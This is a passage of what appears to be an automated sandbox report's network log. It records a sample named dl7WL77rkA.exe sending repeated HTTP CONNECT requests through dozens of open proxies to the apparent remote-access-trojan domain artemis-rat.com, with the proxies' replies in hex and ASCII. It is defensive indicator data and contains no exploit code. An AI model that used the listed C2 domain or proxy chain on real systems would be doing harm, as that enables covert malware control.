                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.702013969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1676192.168.2.553960192.64.115.90471003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.639508009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1677192.168.2.55454791.134.140.160530123876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.641824961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.405049086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.423903942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1678192.168.2.55454258.246.58.15090023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.642366886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.960592985 CET311INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1679192.168.2.554550194.163.137.10690503876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.642376900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.461102009 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1680192.168.2.55462198.181.137.8341453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.645595074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1681192.168.2.55383746.209.204.14780803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.646234035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.133898973 CET202INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 718
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Wed, 06 Mar 2024 14:53:24 GMT
                                                                                                                                                                                                                                                            Expires: Wed, 06 Mar 2024 14:53:24 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1682192.168.2.55043995.84.166.13880803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.646485090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1683192.168.2.55310083.212.123.11338883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.646609068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.980072021 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.015429974 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1684192.168.2.554574154.12.178.107299853876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.652192116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1685192.168.2.55435864.227.108.25319083876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.652193069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1686192.168.2.554516115.127.31.6680803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.653053999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1687192.168.2.553945162.241.53.72314143876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.653278112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.701895952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.702012062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.702050924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1688192.168.2.5545813.123.150.19231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.657740116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.964258909 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1689192.168.2.554557123.126.158.50803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.660749912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1690192.168.2.55461979.143.177.29219723876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.666888952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.983716011 CET131INHTTP/1.1 503 Too many open connections
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0a
                                                                                                                                                                                                                                                            Data Ascii: Maximum number of open connections reached.


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1691192.168.2.554528116.199.168.141453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.667606115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1692192.168.2.554648167.71.5.8380803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.668087006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.683559895 CET28INHTTP/1.1 400 Bad Request


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1693192.168.2.554592146.59.18.246580313876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.668195009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.405153990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.424063921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.405579090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.396033049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.343368053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:01.311263084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1694192.168.2.554580148.72.215.23049903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.669456959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1695192.168.2.554697104.27.83.183803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.670689106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.824985027 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1696192.168.2.5546468.142.3.14533063876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.673388004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1697192.168.2.55466191.134.140.160119463876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.673429012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.405095100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
